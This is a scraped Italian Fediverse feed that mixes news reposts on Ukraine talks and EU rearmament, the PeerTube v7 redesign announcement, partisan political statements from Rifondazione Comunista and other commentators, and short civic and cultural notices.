@Notizie dall'Italia e dal mondo
Il nuovo partito parteciperà alle elezioni presidenziali del 2026 come blocco pro-presidenziale.
L'articolo COLOMBIA. La sinistra si unisce proviene da Pagine Esteri.

pagineesteri.it/2024/12/18/in-…




Sharkey: un progetto Fediverse bello dentro e fuori! Il post sul software del Fediverso ergonomicamente più interessante a cura di @Elena Rossini ⁂

@Che succede nel Fediverso?

c'è una piattaforma di microblogging Fediverse che è assolutamente meravigliosa e piena di caratteristiche di design brillanti che rendono il suo utilizzo un vero piacere. Il suo nome è Sharkey, è un "soft fork" di Misskey , e merita sicuramente la vostra attenzione

blog.elenarossini.com/sharkey-…



I seminari autunno-invernali di Rifondazione - Relatore: Rino Malinconico discussant: Rosa Tavella Raffaele Tecce Gloria Scarlino Lunedì 15 dicembre 2024 Per quanto corrisponda a verità il detto latino “Repetita iuvant”, ci sforzeremo di andare oltre la ricapitolazione di quanto già contenuto in molti nostri documenti. Il tema che infatti affronteremo in questo nostro incontro verterà [...]


UCRAINA - “Ci sono stati Ue che vorrebbero trattare per smembrarla e conquistarne dei pezzi”

Tusk parla di trattative sull'Ucraina in inverno, ma tutto dipende da Trump e Putin. Mentre la UE fantastica su un riarmo miliardario

Il primo ministro polacco Donald Tusk dice che Russia e Ucraina potrebbero iniziare a negoziare in inverno. Ma non sarà certo lui a fare da ago della bilancia. Toccherà a Trump e Putin sbrigarsela, spiega Gianandrea Gaiani, direttore di Analisi Difesa, e gli altri andranno al seguito, compresa la UE, che per ora non conta, anche se, secondo un piano all’apparenza da fantapolitica (ma che potrebbe non essere così fantasioso), alcuni Paesi che ne fanno parte (Polonia, Ungheria, Romania) potrebbero “pasteggiare” con ciò che resta dell’Ucraina, prendendosi regioni che un tempo erano loro. Bruxelles, intanto, fantastica su un piano da 100 miliardi di spesa per la Difesa, ma l’economia non attraversa certo un buon momento e un progetto del genere potrebbe affossarla. A meno che queste spese vengano escluse dal computo del rapporto deficit-Pil.

Donald Tusk, premier polacco, dice che le trattative sull’Ucraina potrebbero partire in inverno, proprio quando a Varsavia toccherà la presidenza di turno della UE. Il negoziato finalmente è vicino?

Se c’era una nazione che aveva la possibilità di giocare la carta dei negoziati durante la presidenza UE era l’Ungheria. Per la sua ostilità palese verso la Russia e per gli interessi su una regione ucraina come la Galizia, non vedo la Polonia come soggetto che può portare avanti una trattativa. Del resto, la Russia ha sempre sottolineato che si può negoziare solo tenendo conto della situazione sul terreno. E da quel punto di vista, anche se in Italia non ne vuole parlare più nessuno, i russi avanzano: le ultime cinque roccaforti del Donbass sono circondate e sono in procinto di cadere. Credo che Putin stia stringendo l’offensiva prima dell’insediamento di Trump.

Le pretese russe sono sempre le stesse?

Vogliono la cessione della sovranità sulla Crimea e su altre quattro regioni che oggi non controllano ancora per intero, un’Ucraina neutrale, che non entri nella NATO e non ospiti basi e armi straniere. Se ci sarà la disponibilità a trattare su questi punti, Mosca lo farà; diversamente, no. L’elemento tempo è fondamentale, perché più il tempo passa più Kiev sarà in difficoltà: già si parla di arruolare i diciottenni e i ventenni e questo comporterà la fuga di molti, un’altra generazione che si nasconderà per evitare lo sterminio in prima linea.

In realtà, quindi, Putin andrà avanti fino a che riuscirà a conquistare qualcosa?

La trattativa la gestiranno americani e russi, la UE non conta nulla. Le ultime dichiarazioni di Kaja Kallas, alta rappresentante UE per la politica estera, dimostrano il vuoto totale dell’Unione Europea, dove le uniche cose che si riescono a mostrare sono un fanatismo russofobico e il soffocamento delle libertà dei cittadini europei: il caso Romania è eclatante, persino la candidata al ballottaggio, filo-UE, ha denunciato la violazione della libertà e della democrazia con l’annullamento del voto. Gli arbitri del negoziato saranno Russia e USA, quelli di Trump, perché i colpi di coda di Biden sono tutti tesi a destabilizzare.

Insomma, non sono né Tusk né la Polonia che favoriranno il processo di pace?

Tusk è uno dei maggiori esponenti della russofobia europea, non vedo come possa far partire il dialogo. A meno che non scopriamo che c’è un accordo sottobanco fra russi e polacchi, per cui, nel momento in cui l’Ucraina tracolla, visto che Varsavia ha schierato truppe alla frontiera con Kiev con il pretesto di fare deterrenza nei confronti dei russi, la Polonia si riprenderà la Galizia. Ma a questo punto entriamo in uno scenario denso di nubi per l’Ucraina come Stato.

Va a finire che l’Ucraina entrerà sì nella UE, ma a pezzi, ognuno dei quali diventato territorio di altre nazioni?

Può sembrare uno scenario di fantapolitica, incluso quello in cui romeni, ungheresi e polacchi si riprendano le regioni che erano appartenute ai loro Stati, ma, visto quello che è successo negli ultimi tempi, non escluderei nulla.

Il vertice Trump-Macron-Zelensky, in occasione dell’inaugurazione di Notre Dame a Parigi, è servito solo al neoeletto presidente americano per ribadire che comanda lui?

L’America deciderà per l’Ucraina: la gran parte delle armi e dei soldi per continuare la guerra vengono dagli USA. Se Trump chiuderà il rubinetto, il problema è già risolto. Non sarà l’Europa a salvarla. Zelensky non ha alternative, non può combattere da solo. Biden sgancia aiuti ogni settimana, ma poi il presidente ucraino dovrà fare i conti con il nuovo inquilino della Casa Bianca.

Cosa potrà spuntare al massimo Kiev in un negoziato?

La base per iniziare il negoziato è quella che è. Certo, un conto è un accordo, un conto il cessate il fuoco. Gli americani hanno tutto l’interesse a lasciare che poi se ne occupi l’Europa.

A Washington basterebbe far tacere le armi, dopo di che mollerebbe la patata bollente a Bruxelles?

Noi europei ci ritroveremo con l’eredità pesantissima della ricostruzione dell’Ucraina e con la necessità di gestire una guerra fredda con la Russia. È esattamente quello che Trump vuole. Così dirà: “Volete la protezione nucleare americana? Dovete pagare di più”.

Intanto, Andrius Kubilius, ex presidente lituano e commissario UE per la Difesa, ha lanciato un piano per portare la spesa militare europea a 100 miliardi in sette anni. Bruxelles vuole diventare una potenza militare?

Questa UE ha portato al disastro l’Europa con la prima Commissione von der Leyen; completerà l’opera, se glielo lasciano fare, con la seconda. Il riarmo europeo è una sciocchezza gigantesca, lo dimostra il fatto che in tutti i Paesi l’opinione pubblica non sostiene il riarmo, non comprende perché dobbiamo prepararci a questa fantomatica guerra contro l’invasore russo, che nessuno vede, tranne i baltici e i polacchi.

Un piano di riarmo insostenibile?

Fare il riarmo nel momento in cui abbiamo l’economia in recessione, l’energia più cara di qualunque altra area industrializzata, non riusciamo più a produrre acciaio perché costa troppo proprio dal punto di vista dell’energia e saremo costretti a spendere in welfare per disoccupati e cassintegrati, è una follia che porterà l’Europa al disastro economico ed energetico (ci siamo già) e poi al crollo delle leadership e dei governi (e mi pare che ci siamo già anche qui). Poi, se qualcuno pensa che, per evitare il disastro del crollo dei governi, basti annullare le elezioni, ci troveremo nella stessa situazione del Patto di Varsavia nel 1956 a Budapest e nel 1968 a Praga. Solo che stavolta il Patto di Varsavia e l’Unione Sovietica siamo noi.

Insomma, anche volendo, il riarmo europeo è una chimera?

Il Regno Unito parlava di riarmo, ma alla fine, nel bilancio della Difesa del 2025, ha annunciato che ritirerà cinque navi della Royal Navy e rinuncerà a decine di droni ed elicotteri. Cento miliardi era anche lo stanziamento che fece la Germania subito dopo l’inizio della guerra in Ucraina come investimenti per la Difesa. Parlare della stessa cifra per i piani congiunti europei può avere una sua ragionevolezza soltanto se passa l’esclusione delle spese militari dal computo delle spese di bilancio per i Paesi UE. È la posizione del ministro della Difesa italiano Crosetto. Non devono essere considerate all’interno del rapporto deficit-Pil su cui l’Europa insiste.

-int. di Paolo Rossetti a Gianandrea Gaiani-

#TGP #UE #Ucraina

[Fonte: https://www.ilsussidiario.net/news/ucraina-ci-sono-stati-ue-che-vorrebbero-trattare-per-smembrarla-e-conquistarne-dei-pezzi/2779911/]




Con la nuova release 7 PeerTube rinnova completamente l'interfaccia!


@Che succede nel Fediverso?

Il comunicato di Framasoft:

Con il suo nuovissimo design, la nuova interfaccia di PeerTube non è solo più bella (anche se lo è). È anche più semplice, più facile da usare e da capire e più accessibile. Benvenuti in una nuova era di questo software che consente ai creatori di ottenere, controllare e connettere le proprie piattaforme video.

Riflettiamo sulla crescita dell'ecosistema PeerTube

Sette anni fa, PeerTube era principalmente uno strumento con cui gli appassionati di FOSS esperti di tecnologia erano felici di giocare. Poi è diventato popolare tra i creatori di contenuti che volevano uno specchio auto-ospitato dei loro canali YouTube/Twitch; e tra le comunità che volevano creare e regolamentare il loro spazio sicuro (persone sorde, persone queer, ecc.)

Oggigiorno, PeerTube sta riscuotendo un successo crescente tra i creatori di contenuti che pubblicano contenuti originali (o contenuti esclusivi per la loro comunità), media alternativi e istituzioni: college, ministeri dell'istruzione, archivi televisivi e radiofonici nazionali, ecc.

Le strutture pubbliche hanno spesso bisogno di condividere contenuti video senza meccanismi di cattura dell'attenzione o di sfruttamento dei dati.

Per noi si tratta di un nuovo passo nell'evoluzione del pubblico di PeerTube.

Ecco perché quest'anno abbiamo chiesto a La Coopérative des Internets di condurre una ricerca UX approfondita (completa di interviste, test, ecc.) e di aiutarci ad avviare una riprogettazione completa dell'interfaccia. Il nostro obiettivo era migliorare PeerTube in modo che si adattasse meglio alle esigenze di quel nuovo pubblico. Avevamo chiaro che tutto era sul tavolo: colori, vocabolario, layout...

Bene, siamo orgogliosi di rilasciare questa v7 di PeerTube , che getta le basi per una completa riorganizzazione dell'interfaccia.

Anteprima: temi, nuovi colori e vocabolario

Il design di PeerTube, gli schemi di colori, il vocabolario, ecc. sono stati costruiti in sette anni, mentre andavamo avanti, imparando, ricevendo aiuto dalla comunità. Questo nuovo design è stata un'opportunità per fare un passo indietro e ottenere alcune intenzioni dietro l'interfaccia.

Il nuovo tema predefinito Light/beige è più calmo e piacevole alla vista rispetto all'originale Black & orange. Abbiamo anche aggiunto un tema Dark/brown nel core per gli amanti della modalità scura. Entrambi mirano a facilitare la navigazione video.

Creare quei nuovi temi è stata un'opportunità per ripulire e semplificare il modo in cui è codificata l'interfaccia (in particolare: ripulire il CSS, concentrandosi sulle variabili), limitando al contempo le rotture con temi personalizzati preesistenti. Ora è davvero più facile creare nuovi temi per PeerTube e speriamo che condividerete le vostre creazioni!

Abbiamo anche aggiornato il gergo di PeerTube. C'è un motivo per cui ora stiamo usando il termine "piattaforma(e)" per parlare di tutti i server in cui è stato installato PeerTube.

Sì, chiamarli "istanza(i)" è stata la norma nel mondo esperto di tecnologia degli appassionati di activity-pub. Ma, per coloro che non sono abbastanza privilegiati da conoscere il fediverse e il suo protocollo, la parola piattaforma è autoesplicativa e facilita l'inclusione.

Godetevi layout più semplici e pertinenti

Ci sono molte informazioni da visualizzare su qualsiasi pagina di PeerTube. I layout e i menu sono cresciuti organicamente durante sette anni di sviluppo... e avevano bisogno di qualche potatura! Abbiamo rimodellato quei menu e quelle pagine per portare avanti informazioni rilevanti e presentare un modo più intuitivo per scoprire cosa stai cercando.

Ad esempio, i creatori di contenuti accedevano ai loro canali e caricavano video nella loro libreria (dove qualsiasi utente di PeerTube può accedere alle proprie playlist, cronologia, ecc. dei video guardati). Ora in PeerTube v7, c'è una nuova sezione chiamata "spazio video" specifica per le esigenze di chi carica video.

Allo stesso modo, le pagine "admin" per gli amministratori delle piattaforme PeerTube sono state ora separate in una pagina Panoramica (per ottenere maggiori informazioni sugli utenti, sui video ospitati, ecc.), una Moderazione (per gestire abusi, blocchi, registrazioni) e una Impostazioni (per accedere a configurazioni, runner, ecc.).

Le diverse pagine che presentavano i video sulla piattaforma PeerTube (Aggiunti di recente, Video locali, Di tendenza) sono state unite in una pagina "Sfoglia video" , che include filtri rapidi per visualizzare le stesse selezioni di contenuti in modo più diretto.

Lo stesso intento ha guidato il nuovo layout della pagina "Scopri video": ci auguriamo che possa dare spunti agli utenti curiosi.

Ovviamente, la barra di sinistra e i menu dell'intestazione sono stati riorganizzati per riflettere tali modifiche e rendere la navigazione ancora più intuitiva. Ora puoi accedere alle impostazioni del tuo account e alle notifiche dal menu dell'intestazione , come è consuetudine su altri siti web.

Visualizzazione di informazioni rilevanti per mostrare la diversità dei video

Uno dei commenti più frequenti dei nuovi utenti è stato che la vecchia interfaccia era confusa, ovvero era difficile per un utente capire dove si trovava e da dove provenivano i video.

Ecco perché, in PeerTube v7, abbiamo aggiunto più modi per consentire ai proprietari di piattaforme di personalizzare e identificare le proprie piattaforme : aggiungere facilmente un banner (utilizzato nelle pagine, nell'esplorazione delle app mobili e nel nostro motore di ricerca SepiaSearch ) e un'icona della piattaforma (utilizzata dall'applicazione mobile). Inoltre, il nome e la descrizione della loro piattaforma vengono ora visualizzati agli utenti non registrati nel menu di sinistra.

Abbiamo anche cambiato il modo in cui le miniature dei video appaiono in tutte le pagine che elencano i video . Gli avatar dei canali sono sempre visualizzati, quindi è più facile identificare i creatori, i titoli sono evidenziati, la data e il numero di visualizzazioni del video sono presenti ma attenuati. Queste modifiche rendono le pagine che elencano i video più facili da leggere e facilitano l'identificazione del video che vuoi guardare.

Accessibilità in prima linea

La riprogettazione è stata anche l'occasione per dare priorità all'accessibilità dell'interfaccia (per le persone con disabilità). Nel 2023, abbiamo preparato il codice e lavorato su ciò che sapevamo ... così l'audit di accessibilità completo pianificato per il 2024 (grazie al consorzio NGI Entrust) avrebbe portato quanti più miglioramenti nuovi e dettagliati possibili.

Grazie all'audit, abbiamo migliorato moltissimi aspetti : abbiamo sistemato i contrasti e i temi dei colori, la barra di avanzamento, diversi componenti e vari problemi con lo screen reader. Abbiamo aggiunto etichette mancanti sugli elementi interattivi, link "salta menu", sottolineatura dei link. Abbiamo anche migliorato la navigazione tramite tastiera e reimplementato componenti di una dipendenza non accessibile.

Crediamo sinceramente che PeerTube abbia risolto i problemi di accessibilità e dovrebbe essere all'altezza degli standard ... ma sappiamo, ora, che c'è sempre spazio per miglioramenti e per imparare direttamente da chi è interessato .

Modifica dei sottotitoli, promozione dei video e molto altro ancora...

Con il nuovissimo strumento di transcodifica remota che abbiamo introdotto l'anno scorso, ottenere una trascrizione o sottotitoli per il tuo video è più facile che mai. Ma lo strumento di modifica dei sottotitoli era... ehm... diciamo "barebone". Ora stiamo introducendo una nuova modalità che rende la modifica dei sottotitoli davvero comoda .

Abbiamo accolto e integrato a monte un contributo della comunità su SEO (ottimizzazione per i motori di ricerca), per aiutare a promuovere i contenuti ospitati da PeerTube sui motori di ricerca. Un avatar della piattaforma ora appare nei tag opengraph, gli account e i canali vuoti sono nascosti dalla mappa del sito, mentre ora sono presenti tag video aggiuntivi.

Infine, PeerTube è stato tradotto in slovacco .

Vorremmo davvero prenderci del tempo per ringraziare la comunità che contribuisce alle traduzioni di PeerTube: non avremmo mai pensato che un giorno il nostro software sarebbe stato disponibile in più di 38 lingue.

Un enorme ringraziamento a tutti voi, persone meravigliose, che avete dedicato tempo e cura per contribuire al nostro strumento di traduzione: siete straordinari.


(grazie ad alephoto85@livellosegreto.it per la segnalazione)


#PeerTube v7 is out!

Themes, pages, menus, layouts, accessibility… The whole interface gets a relooking to make your #video platforms more enjoyable and easy to use!

Here are the details: framablog.org/2024/12/17/peert…




Non posso che applaudire all’iniziativa dell’amico e compagno Nicola Fratoianni che ha consegnato a Giorgia Meloni cartoline per la pace in vista del Natale. Condivido ovviamente anche la richiesta di non aumentare le spese militari. Mi permetto di consigliargli che se gli sono avanzate delle cartoline potrebbe donadistribuirle anche agli alleati del PD visto che si avvicina l’ennesima votazione sull’invio di armi all’Ucraina. Sarebbe un fatto positivo se il PD votasse finalmente contro l’invio di armi. Suggerirei anche di mandare una cartolina a Enrico Letta con cui AVS si è alleata alle ultime elezioni politiche invece di partecipare a una coalizione pacifista. Alla festa di Atreju Letta ha sostenuto una proposta gravissima di debito comune e MES per finanziare il riarmo su cui sarebbe doveroso che tutte le forze pacifiste si esprimessero con nettezza.

Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista

in reply to Rifondazione Comunista

@rifondazione gli suggerireste di inviare la cartolina della pace anche all'ambasciata russa?


A new non-profit for governance of Bridgy Fed, PeerTube releases their yearly update with a complete redesign, and the organisation behind Mammoth and sub.club winds down due to a lack of funding.


Pechino mostra i piani di attacco contro le navi Usa. Ecco perché

@Notizie dall'Italia e dal mondo

Un recente rapporto cinese ha rivelato una lista dettagliata di obiettivi navali statunitensi, tra cui sistemi radar e sensori, che verrebbero attaccati in un potenziale conflitto futuro. La singolarità della pubblicazione di tali informazioni pone interrogativi sulla natura della mossa:



I costi della democrazia

@Politica interna, europea e internazionale

18 dicembre 2024, ore 18:00 in diretta sui social della Fondazione Interverranno Anna Paola Concia Giuseppe Benedetto Michele Magno
L'articolo I costi della democrazia proviene da Fondazione Luigi Einaudi.

fondazioneluigieinaudi.it/i-co…



Nuovi Eurofighter per l’Aeronautica, arriva il via libera dal Parlamento

@Notizie dall'Italia e dal mondo

Proseguono gli sforzi dell’Italia per mantenere aggiornate le proprie capacità aeree. La commissione Difesa della Camera e la Commissione Affari esteri del Senato hanno dato parere favorevole al decreto ministeriale per l’acquisto di ventiquattro Eurofighter Typhoon, che andranno a sostituire i ventisei in



È online un nuovo episodio di Václav Podcast, il podcast di Centrum Report che ogni mese vi aggiorna su quello che succede in Polonia, Repubblica Ceca, Slovacchia e Ungheria.

Potete trovarlo sul nostro sito: centrumreport.com/

Oppure potete ascoltarlo direttamente su Spreaker: spreaker.com/episode/17-praga-…

Se fate l'accesso dal sito per noi è un po' meglio perché ci aiutate in termini di indicizzazione, ma se preferite andare direttamente su Spreaker va bene uguale.

In ogni caso, come dice il grande Date Knightmare,

Grazie perché ci ascoltate



Von der Leyen e Kaja Kallas, le donne sbagliate nel posto sbagliato al momento sbagliato

Con Ursula von der Leyen riconfermata alla guida della Commissione europea e l’ex premier estone Kaja Kallas promossa al ruolo di Alto rappresentante per la politica estera e di sicurezza comune (Pesc), l’Ue ha le persone sbagliate al posto sbagliato nel momento sbagliato? Difficile pensare a un combinato disposto di leader per la politica estera del blocco tanto in distonia con le esigenze attuali dell’Europa, in un contesto di grandi crisi geopolitiche che necessitano di attenzione e mediazione. L’esatto opposto di quanto promettono l’Ursula-bis e la sua nuova “ministra degli Esteri”.

Di recente, anche la sempre compassata Politico.eu ha dedicato un ritratto a Kallas, che da premier è stata protagonista del sostegno estone all’Ucraina, della focalizzazione di Tallinn sulla minaccia della Russia e sulle sfide di vario tipo (dalle minacce ibride a quelle d’intelligence) che Mosca porterebbe all’Europa. Kallas è presentata come un’idealista che è pronta a dare una ventata d’aria fresca alla diplomazia europea, mettendo in marcia i ministri degli Esteri dei Ventisette. E, nota la testata paneuropea, “la nuova prima diplomatica dell’Ue è pronta a essere…non diplomatica”, sottolineando che “il suo idealismo, oltre alla sua incrollabile dedizione ai valori della democrazia e dell’apertura, la rendono l’antitesi della politica realista e da uomo forte incarnata dal prossimo presidente degli Stati Uniti, Donald Trump”. Ammesso che sia vera questa dicotomia, la diplomazia non può andare di pari passo con l’idealismo spinto. Specie in una fase che impone pragmatismo e praticità, a partire dal rapporto dell’Europa con la guerra in Ucraina.

Del resto, ci sarebbe da sottolineare il fatto che Kallas è la stessa paladina della democrazia che da primo ministro liberale ha di fatto cavalcato il revisionismo storico proprio dell’estrema destra, arrivando a mettere sullo stesso piano Germania nazista e Unione Sovietica e a criticare come atto deliberato contro i civili i bombardamenti che colpirono Tallinn quando l’Armata Rossa nel 1944 si mosse per cacciare la Wehrmacht dalla città. L’obiettivo? Mostrare l’atavica malvagità dei russi. Non la figura che pare più adatta a ridare un ruolo diplomatico all’Europa qualora si arrivasse a parlare di cessate il fuoco.

E Ursula von der Leyen? Per la presidente della Commissione la discussione è simile. Che visione di politica estera credibile può dare una donna nel cui mandato l’Europa ha visto regredire le sue posizioni sullo scacchiere globale? E che leadership può effettuare colei che ha raccontato che i russi rubavano i microchip dalle lavastoviglie per i loro arsenali? O che ha usato l’arma della minaccia bellica alle porte per costruire una Commissione da mobilitazione senza lavorare per dare all’Ue gli strumenti di deterrenza adatti? Domande obbligatorie. A cui va aggiunto l’atteggiamento imprudente tenuto in occasione della prima fase della guerra israeliana a Gaza, dove Von der Leyen ha dato un’apertura di credito sconsiderata a Benjamin Netanyahu che ha danneggiato la diplomazia europea. Insomma, Frau Ursula e la Lady di Ferro estone non sembrano le figure adatte a dare un rilancio diplomatico all’Europa. E anzi potrebbero incarnare semplicemente lo straniamento della realtà della sua classe dirigente. La prima crisi della nuova Commissione, quella siriana, ha visto l’Ue alla prova dei fatti muta e assente, salvo sulla chiusura a profughi e richiedenti asilo. Un triste monito dei tempi che ci aspettano.

-di Andrea Muratore-

[Fonte: https://it.insideover.com/politica/von-der-leyen-e-kaja-kallas-le-donne-sbagliate-nel-posto-sbagliato-al-momento-sbagliato.html]



The Department of Homeland Security knows which countries SS7 attacks are primarily originating from. Others include countries in Europe, Africa, and the Middle East.#News #Privacy


OGGI, 17 DICEMBRE, NEL 1903


Immagine/foto

I fratelli Wilbur e Orville Wright di Dayton, Ohio, effettuano con successo il primo volo con un equipaggio umano su un aereo a motore nei pressi di Kitty Hawk, nella Carolina del Nord, utilizzando il loro velivolo sperimentale, il Wright Flyer.

youtu.be/AkEUs59yl4c

#otd
#accaddeoggi

@Storia

Storia reshared this.

in reply to storiaweb

Ecco una descrizione del testo alternativo:

La copertina di un libro mostra un biplano dei fratelli Wright in volo, sullo sfondo di un paesaggio semplice con alberi. Il titolo del libro, "17.12.1903", è in rosso su uno sfondo beige. Sotto, il sottotitolo: "GIORNI CHE HANNO FATTO LA STORIA", e poi il titolo principale: "IL PRIMO VOLO DEI FRATELLI WRIGHT". In basso a sinistra, è presente il logo de "La Gazzetta dello Sport". Il nome dell'autore, Marco Truzzi, è scritto sotto il titolo principale.

Fornito da @altbot, generato utilizzando Gemini



Come funzionano le notizie per fare disinformazione.
Questo è un articolo su un'automobile ibrida incendiata.
ilgiornaledivicenza.it/territo…
Nell'articolo viene specificato che è ibrida.
Questo invece è un articolo su un'altra autovettura incendiata, una Fiat Punto, ovviamente con motore endotermico, ma non viene specificato.
ilgiornaledivicenza.it/territo…
#bev #MobilitaElettrica #disinformazione


UNA GABBIA DISTOPICA CHIAMATA UE
L'UE sta facendo carte false per impedire a Georgescu di vincere le prossime elezioni rumene dopo aver annullato le precedenti.

Come denuncia lo stesso Georgescu, gli è stato tagliato il riscaldamento e la connessione internet in casa. Stanno progettando di vietare TikTok e di imporre pesanti restrizioni alla piattaforma X. Hanno smesso di trasmettere Realitatea Plus TV, l'unico grande canale che critica la decisione di annullare le elezioni presidenziali.

Deve fare molta paura all'UE l'elezione di un candidato che non può essere telecomandato dalle centrali del governo occulto.

L'UE è diventata la fattoria degli animali orwelliana: messa a tacere e persecuzione di personaggi scomodi del mondo della politica e della libera informazione (Georgescu, Durov, avvocato Füllmich), economia di guerra, pesanti interferenze nelle elezioni democratiche dei paesi membri, digital economy a scapito delle economie locali, transizione green forzata...
Benvenuti all'Inferno.

Federica Francesconi



Mondiali 2034 in Arabia Saudita. Amnesty: “Decisione sconsiderata”


@Notizie dall'Italia e dal mondo
L’ONG e altre 20 organizzazioni per i diritti umani condannano la scelta della Fifa: ospitare la World Cup nel Paese di Mohammad Bin Salman è una decisione che “metterà molte vite a rischio”, soprattutto quelle di migliaia di lavoratori che, secondo la denuncia, saranno sfruttati




📌 #Scuola, fino alle 23.59 di lunedì #30dicembre 2024, sarà possibile presentare la domanda di partecipazione per i nuovi concorsi per oltre 19.000 docenti.

Qui tutti i dettagli ▶️ mim.gov.



DIFENDERE LE SPECIE IN VIA DI ESTINZIONE. LA CONVENZIONE CITES ED I CARABINIERI FORESTALI


##

Immagine/foto

La recente presentazione del Calendario CITES dei carabinieri Forestali che si occupano di tale materia, fornisce l'occasione per tornare a parlare di questo particolare servizio, non conosciuto da molti, che ha importanti ricadute in ambito di cooperazione internazionale tra forze di polizia.
Nel 1973, nell'ambito delle attività dell'ONU per l'ambiente, 80 paesi firmarono a Washington la Convenzione CITES (Convention on International Trade of Endangered Species) per la tutela della biodiversità, attraverso il controllo del commercio di specie di flora e fauna, rischio di estinzione o particolarmente vulnerabili.
Entrata in vigore il 1° luglio 1975, oggi conta ben 183 paesi, quasi la totalità dei componenti della comunità internazionale. Anche l'Italia quale paese membro, si è dotata di una specifica normativa, che è la legge 150 del 1999.
L’Arma dei carabinieri ha un ruolo da protagonista, quale co–Autorità di gestione.
Il commercio illegale delle specie selvatiche (wildlife traffic) è uno dei traffici illeciti più importanti al mondo, dopo quello di droga, armi ed esseri umani, ed è un fenomeno per sua natura transnazionale, che per essere contrastato richiede la collaborazione di organismi, autorità, organizzazioni governative e non–governative (ONG), per la raccolta delle informazioni, la loro disseminazione, lo scambio di esperienze, di tecniche investigative e di intelligence. Per questa ragione, su tutto il territorio nazionale sono dislocati oltre 50 uffici CITES che rilasciano mediamente circa 80.000 certificati che consentono l'importazione dopo verifiche all'anno, riguardanti animali riprodotti in cattività, ma anche zanne ed oggetti in avorio di elefante, articoli in pelle di rettile, tessuti e pellicce pregiati, piante ornamentali, legname e prodotti derivati dal legno.

Un’altra importante funzione del Servizio CITES è quello di educare alla legalità e sensibilizzare i cittadini, tra i quali vi sono anche viaggiatori e turisti.

L’Italia è un Paese di destinazione, si pensi ad esempio alla importazione illegale di pappagalli tropicali, ma va al riguardo sottolineato come sia anche Paese di origine del traffico: vi sono gruppi criminali coinvolti nella raccolta di nidi e nel traffico di specie di uccelli in via di estinzione (cardellini, verzellini ed altri), il cui mercato principale sono i Paesi europei. Cavallucci marini e i cetrioli di mare invece, raccolti lungo gli habitat costieri italiani, sono specie trafficate verso mercati cinesi.

Il video di presentazione del Calendario si può vedere qui
materialious.nadeko.net/search…

@Notizie dall'Italia e dal mondo



@RaccoonForFriendica Finally we have a Weblate project for the translations of the app UI, changelogs and metadata. Hope this will help us all create a better user experience and correct some localization mistakes!

#raccoonforfriendica #procyonproject #foss #opensource #friendica #fediverseapp

reshared this

in reply to Cătă

@Cătă de asemenea! Enjoy the holidays, we deserve some rest to recharge for the new year!

RaccoonForFriendica reshared this.



Il regalo di natale della Meloni, un proficuo aumento dello stipendio di 3000 Euro ai ministri non eletti al Parlamento - 𝐑𝐞𝐝𝐚𝐳𝐢𝐨𝐧𝐞 𝐒𝐞𝐫𝐚
redazionesera.altervista.org/i…


È online #ANIST, l’Anagrafe Nazionale dell’Istruzione, la piattaforma digitale che rende dati e risorse più accessibili, semplificando la gestione amministrativa e offrendo un sistema più efficiente per cittadini e PA.


▶️mim.gov.




Enrico Letta ha letteralmente consegnato nel 2022 il governo a Giorgia Meloni rompendo con il M5S in nome della fedeltà assoluta alla NATO e all’agenda Draghi.

Ora ricompare alla festa di Atreju con una proposta indecente per esaudire le richieste della NATO di portare la spesa militare al 3% del PIL.
Non contento dei danni che ha fatto da Presidente del Consiglio con i tagli alla sanità e da segretario del PD con il sostegno forsennato alla guerra, Enrico Letta ora propone di utilizzare il MES e fare “debito comune” per aumentare la spesa militare.

Mentre Cgil, Uil e sindacati di base scioperano per chiedere più investimenti per la sanità e lo stato sociale non per le armi, l’ex-segretario del PD propone di sostenere la corsa agli armamenti.

Se in Italia metà della popolazione non vota è anche perché con la nascita del PD gente come Letta, che in Francia starebbe con Macron e in Germania nel partito di Ursula von der Leyen, è stata presentata come la sinistra.

Quelli come Letta sono i migliori alleati di Giorgia Meloni.

Letta è uno dei rappresentanti di quella “Europa reale” che ha portato l’Europa dalla pace alla guerra e dal modello sociale al mercato asociale creando le condizioni sociali e culturali per la crescita dell’estrema destra.

Una vera sinistra e il cattolicesimo democratico che si ispira a Papa Francesco non hanno problemi a unirsi per chiedere che il debito comune si faccia per finanziare la sanità, lo stato sociale, le pensioni, la lotta alla povertà, la riconversione ecologica, la ricerca, l’istruzione, la cultura, l’industria farmaceutica pubblica, la creazione di lavoro in Europa.

Il neoliberismo e l’oltranzismo guerrafondaio di quelli come Letta portano invece assai lontano dalla via maestra della Costituzione.

Sorge un dubbio: ma Letta lavora per Meloni o entrambi sono al servizio degli Stati Uniti qualunque sia l’amministrazione?

Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista – Sinistra Europea